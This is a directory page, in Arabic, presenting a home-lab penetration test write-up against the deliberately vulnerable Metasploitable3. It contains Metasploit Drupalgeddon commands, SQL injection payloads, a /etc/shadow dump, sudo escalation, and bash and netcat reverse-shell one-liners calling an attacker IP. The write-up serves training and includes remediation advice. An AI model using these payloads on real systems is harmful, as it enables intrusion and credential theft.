Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
metasploitable3-pentest-writeup — تقرير اختبار اختراق مختبري منزلي لـ Metasploitable3 يغطي استطلاع Nmap، وDrupalgeddon RCE، وحقن SQL، وإعادة استخدام بيانات اعتماد SSH، وتصعيد صلاحيات sudo، والأصداف العكسية. | Kitploit
أدوات/GitHubGitHub/adfortunato/metasploitable3-pentest-writeup
تصعيد الامتيازاتالاستطلاعهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالCTFاختبار الاختراق

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
التعلم والتعليم
مختبرات وتدريب عملي
GitHubadfortunato/metasploitable3-pentest-writeup

metasploitable3-pentest-writeup

تقرير اختبار اختراق مختبري منزلي لـ Metasploitable3 يغطي استطلاع Nmap، وDrupalgeddon RCE، وحقن SQL، وإعادة استخدام بيانات اعتماد SSH، وتصعيد صلاحيات sudo، والأصداف العكسية.

عرض المستودع
1منذ 18س 33دلم تتم المراجعة بعد

Metasploitable3 — تقرير اختبار الاختراق

المؤلف: Arlen Fortunato
التاريخ: سبتمبر 2026
البيئة: Parrot OS (المهاجم) → Metasploitable3 Ubuntu 14.04 (الهدف)
النطاق: اختبار اختراق شبكة كامل — الاستكشاف، الاستغلال، رفع الصلاحيات، ما بعد الاستغلال
النوع: مختبر منزلي / تدريب Capture The Flag

⚠️ جميع بيانات الاعتماد أدناه محجوبة. كان هذا تمرينًا قانونيًا ومعزولًا في مختبر منزلي.


الأدوات المستخدمة

الأداةالدور
Nmapفحص المنافذ، اكتشاف الخدمات/الإصدارات، بصمة نظام التشغيل
Metasploit (msfconsole)الاستغلال (CVE-2014-3704)، إدارة الجلسات
msfvenomتوليد الحمولات (أصداف عكسية bash/netcat)
nc (netcat)مستمع الصدفة العكسية
curl / sedصياغة SQLi يدويًا + تنسيق مخرجات HTML
ssh / scpالوصول عن بُعد، التحقق من بيانات الاعتماد
openssl s_clientالتحقق من خدمة TLS/SSL
gobusterتخمين الأدلة القسري (استكشاف الويب)

الاستطلاع — فحص Nmap الكامل للمنافذ

root@kitploit:~
nmap -O -sV -p- -oA metasploitable3 <TARGET_IP>

نظام التشغيل: Linux Ubuntu 14.04، Kernel 3.13.0-24-generic x86_64


ملخص النتائج


تفاصيل النتائج

1. UnrealIRCd 3.2.8.1 (CVE-2010-2075) — إيجابية كاذبة

الثغرة: تم توزيع UnrealIRCd 3.2.8.1 تاريخيًا مع ملف ثنائي مُحصّن بحصان طروادة ينفذ أوامر عشوائية عندما يرسل عميل غير مُصادق سلسلة تشغيل قبل التسجيل — تنفيذ كود عن بُعد بصلاحيات مستخدم خادم IRC.

محاولة الاستغلال: وحدة Metasploit exploit/unix/irc/unreal_ircd_3281_backdoor مع الحمولات cmd/unix/reverse_perl، cmd/unix/reverse_netcat، cmd/unix/reverse_bash. أبلغ الفحص التلقائي للوحدة أن الخدمة قابلة للاستغلال؛ لم تُعَد أي جلسة مع أي حمولة.

استكشاف الأخطاء الذي تم إجراؤه:

  • المنفذ قابل للوصول (nc -vz)
  • تم تأكيد أن المنفذ IRC نصي عادي، وليس TLS (openssl s_client)
  • تم تأكيد الاتصال العكسي اليدوي من الهدف أن الشبكة الصادرة تعمل
  • أعاد تشغيل الباب الخلفي اليدوي عبر nc خطأ بروتوكول IRC رقم 451 — تم تحليل الأمر كأمر IRC، ولم يُنفَّذ أبدًا

الخلاصة: تشير لافتة الإصدار إلى البناء القابل للاستغلال، لكن الباب الخلفي غير موجود في هذه النسخة (ملف ثنائي نظيف/مُعاد تركيبه). صُنّفت غير قابلة للاستغلال — إيجابية كاذبة، مع الأدلة.


2. Drupal 7.5 — Drupageddon (CVE-2014-3704)

الثغرة: يحتوي Drupal 7.x قبل 7.32 على حقن SQL حرج في طبقة تجريد قاعدة البيانات يمكّن من تنفيذ كود عن بُعد دون مصادقة.

تأكيد الإصدار: CHANGELOG.txt → "Drupal 7.5, 2011-07-27"

الاستغلال:

root@kitploit:~
msfconsole
use exploit/multi/http/drupal_drupageddon
set RHOSTS <TARGET_IP>
set TARGETURI /drupal/
set LHOST <ATTACKER_IP>
set payload php/meterpreter_reverse_tcp
run

النتيجة:

root@kitploit:~
getuid  → www-data
sysinfo → Linux ubuntu 3.13.0-24-generic x86_64
pwd     → /var/www/html/drupal

استكشاف ما بعد الاستغلال:

  • /var/www/html: chat/، drupal/، payroll_app.php، phpmyadmin/
  • /home: 16 حساب مستخدم

3. تطبيق الرواتب — حقن SQL من نوع UNION (يدوي)

الثغرة: نموذج تسجيل الدخول في payroll_app.php، حقن SQL في حقل كلمة المرور. لم تُستخدم أي أتمتة — تمت الصياغة عبر curl.

الخطوة 1 — تجاوز المصادقة:

root@kitploit:~
' or 1=1#

' يغلق سلسلة SQL، or 1=1 يفرض الصحة، # يعلّق علامة الاقتباس الزائدة.

الخطوة 2 — عدد الأعمدة + تعيين العرض:

root@kitploit:~
' UNION SELECT null, null, null, null#     -- no error = 4 columns
' UNION SELECT 1, 2, 3, 4#                 -- markers: 1=Username, 2=First, 3=Last, 4=Salary

الخطوة 3 — استكشاف information_schema:

السؤالالإجابة
إصدار قاعدة البيانات / المستخدمMySQL 5.5.62، root@localhost

الخطوة 4 — التفريغ (كلمات المرور محجوبة):

root@kitploit:~
' UNION SELECT username, password, salary, null FROM users#

4. SSH — بيانات اعتماد افتراضية وإعادة استخدام بيانات الاعتماد

المسار 1 — حساب افتراضي: زوج بيانات الاعتماد الافتراضي vagrant تمت المصادقة به عبر SSH → مستخدم في مجموعة sudo مع (ALL : ALL) NOPASSWD: ALL.

المسار 2 — إعادة استخدام بيانات الاعتماد: بيانات الاعتماد المستخرجة من تفريغ SQLi تمت المصادقة بها مباشرة عبر SSH كمستخدم مختبر آخر (luke_skywalker، مجموعة sudo، (ALL : ALL) ALL).

الأهمية: يوضح إعادة استخدام بيانات الاعتماد عبر الخدمات — بيانات اعتماد التطبيق مرتبطة بحساب نظام.


5. رفع الصلاحيات (مسارَان)

  • المسار A: vagrant → sudo -l يُظهر NOPASSWD: ALL → sudo su - → uid=0(root).
  • المسار B: luke_skywalker → sudo (ALL : ALL) ALL → sudo su - → uid=0(root).

لم يُطلب أي استغلال محلي — كلا الحسابين يحملان منح sudo مفرطة في التساهل.


6. تفريغ ملف الظل

root@kitploit:~
sudo cat /etc/shadow

تم استخراج 16 تجزئة md5crypt ($1$) — حصاد كامل لبيانات الاعتماد بعد رفع الصلاحيات.


7. ما بعد الاستغلال — الأصداف العكسية

الحمولة 1 — bash:

root@kitploit:~
bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1

تم التقاطها على nc -lnvp 4444 → صدفة تفاعلية.

الحمولة 2 — netcat (أنبوب مُسمّى):

root@kitploit:~
mkfifo /tmp/fifo; nc <ATTACKER_IP> 4445 0</tmp/fifo | /bin/sh >/tmp/fifo 2>&1; rm /tmp/fifo

تم التقاطها على nc -lnvp 4445 → صدفة تفاعلية.

الآلية: الأنبوب المُسمّى (FIFO) يربط مدخلات/مخرجات netcat بـ /bin/sh، مشكّلًا نفقًا ثنائي الاتجاه بمقبس واحد؛ يتم تنظيف FIFO بعد ذلك.


توصيات المعالجة


إخلاء المسؤولية

تم إجراء جميع الاختبارات حصريًا في مختبر منزلي معزول باستخدام برمجيات قابلة للاستغلال عن قصد (Rapid7 Metasploitable3). لم يتم التعامل مع أي أنظمة إنتاجية أو أهداف غير مصرح بها. هذا التقرير لأغراض تعليمية وتطوير المهارات الشخصية فقط.

تنزيل الأداة
المنفذالحالةالخدمةالإصدار
21/tcpمفتوحFTPProFTPD 1.3.5
22/tcpمفتوحSSHOpenSSH 6.6.1p1
80/tcpمفتوحHTTPApache httpd 2.4.7 (Ubuntu)
445/tcpمفتوحSMBSamba smbd 3.X–4.X
631/tcpمفتوحIPPCUPS 1.7
3306/tcpمفتوحMySQLMySQL (unauthorized)
3500/tcpمفتوحHTTPWEBrick httpd 1.3.1 (Ruby 2.3.8)
6697/tcpمفتوحIRCUnrealIRCd
8080/tcpمفتوحHTTPJetty 8.1.7.v20120910
#الثغرةCVE / النوعالمنفذالخطورةالنتيجة
1بصمة إصدار UnrealIRCd — فحص الباب الخلفيCVE-2010-20756697⚠️ إيجابية كاذبةنجح الفحص التلقائي للوحدة، فشل الفحص اليدوي — الباب الخلفي غير موجود في البناء
2Drupal 7.5 — Drupageddon RCECVE-2014-370480🔴 حرجةصدفة Meterpreter بصلاحيات www-data
3تطبيق الرواتب — UNION SQLi (يدوي)حقن يدوي80🔴 حرجةتفريغ كامل لقاعدة البيانات (15 مستخدمًا، كلمات مرور نصية — محجوبة)
4SSH — بيانات اعتماد افتراضية + معاد استخدامهاافتراضية / إعادة استخدام بيانات الاعتماد22🔴 حرجةvagrant (NOPASSWD sudo)، luke_skywalker (sudo ALL)
5رفع الصلاحيات (مسارَان)sudo مُهيأ بشكل خاطئلا ينطبق🔴 حرجةroot عبر كلا الحسابين
6تفريغ ملف الظلما بعد الاستغلاللا ينطبق🔴 حرجةاستخراج 16 تجزئة md5crypt
7أصداف عكسية (bash + netcat)msfvenom / صياغة يدوية4444/4445🟠 عاليةأصداف تفاعلية تم التقاطها على مستمع المهاجم
قواعد البياناتinformation_schema، drupal، mysql، payroll، performance_schema
الجداول في payrollusers
الأعمدة في usersusername، first_name، last_name، password، salary
اسم المستخدمكلمة المرورالراتب
leia_organa[REDACTED]9560
luke_skywalker[REDACTED]1080
han_solo[REDACTED]1200
artoo_detoo[REDACTED]22222
boba_fett[REDACTED]20000
greedo[REDACTED]50000
(+ 9 حسابات أخرى)[REDACTED]—
النتيجةالتوصية
بصمة إصدار UnrealIRCdالتحقق من سلامة مصدر الملف الثنائي (المجاميع الاختبارية)؛ الترقية أو الإزالة
Drupal 7.5الترقية إلى أحدث إصدار مستقر؛ تطبيق SA-CORE-2014-005
حقن SQL في تطبيق الرواتباستعلامات مُعاملة / عبارات مُعدّة مسبقًا؛ التحقق من المدخلات
بيانات اعتماد SSH الافتراضيةتدوير/إزالة الحسابات الافتراضية؛ فرض المصادقة القائمة على المفاتيح
صلاحيات sudo المفرطةتطبيق مبدأ أقل صلاحية؛ إزالة منح NOPASSWD الشاملة
إعادة استخدام بيانات الاعتمادفرض كلمات مرور فريدة لكل خدمة؛ سياسة كلمات المرور
تجزئة كلمات المرور الضعيفةالترحيل من md5crypt → bcrypt / Argon2id